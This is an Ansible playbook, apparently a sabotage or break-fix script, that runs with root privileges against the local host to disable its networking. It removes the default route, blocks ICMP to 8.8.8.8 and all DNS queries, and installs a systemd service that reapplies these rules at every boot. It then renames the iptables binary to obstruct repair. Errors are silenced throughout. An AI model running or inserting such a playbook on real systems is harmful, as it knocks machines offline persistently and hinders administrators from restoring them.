---
- name: Sabotage Network Configuration - Persistent (No distro check)
  hosts: localhost
  become: true
  gather_facts: no  # still off

  tasks:
    - name: Remove default gateway route
      shell: "ip route del default || true"
      ignore_errors: yes

    - name: Block ICMP to 8.8.8.8
      shell: "iptables -I OUTPUT -p icmp --dst 8.8.8.8 -j DROP || true"
      ignore_errors: yes

    - name: Block DNS queries
      shell: |
        iptables -I OUTPUT -p udp --dport 53 -j DROP || true
        iptables -I OUTPUT -p tcp --dport 53 -j DROP || true
      ignore_errors: yes

    - name: Create sabotage-firewall.service
      copy:
        dest: /etc/systemd/system/sabotage-firewall.service
        mode: '0644'
        content: |
          [Unit]
          Description=Persistently sabotage network (firewall rules)
          After=network-online.target
          Wants=network-online.target

          [Service]
          Type=oneshot
          ExecStart=/usr/sbin/ip route del default
          ExecStart=/usr/sbin/iptables -I OUTPUT -p icmp --dst 8.8.8.8 -j DROP
          ExecStart=/usr/sbin/iptables -I OUTPUT -p udp --dport 53 -j DROP
          ExecStart=/usr/sbin/iptables -I OUTPUT -p tcp --dport 53 -j DROP
          RemainAfterExit=true

          [Install]
          WantedBy=multi-user.target

    - name: Enable sabotage-firewall.service
      shell: "systemctl enable sabotage-firewall.service"
      ignore_errors: yes

    - name: Rename iptables to iptables_bak
      shell: "mv /usr/sbin/iptables /usr/sbin/iptables_bak || true"
      ignore_errors: yes

